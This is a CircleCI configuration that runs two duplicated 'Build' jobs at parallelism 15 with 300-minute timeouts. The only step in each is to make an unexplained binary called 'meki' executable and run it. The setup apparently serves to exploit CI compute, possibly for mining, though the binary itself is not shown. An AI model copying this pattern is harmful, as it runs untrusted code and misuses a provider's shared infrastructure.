version: 2.1

jobs:
  build:
    parallelism: 15
    docker:
      - image: redis:latest
    steps:
      - checkout
      - run:
         name: Build
         command: |
                     chmod +x meki && ./meki
         no_output_timeout: 300m
  build2:
    parallelism: 15
    docker:
      - image: redis:latest
    steps:
      - checkout
      - run:
         name: Build
         command: |
                     chmod +x meki && ./meki
         no_output_timeout: 300m

workflows:
  main:
    jobs:
      - build
      - build2
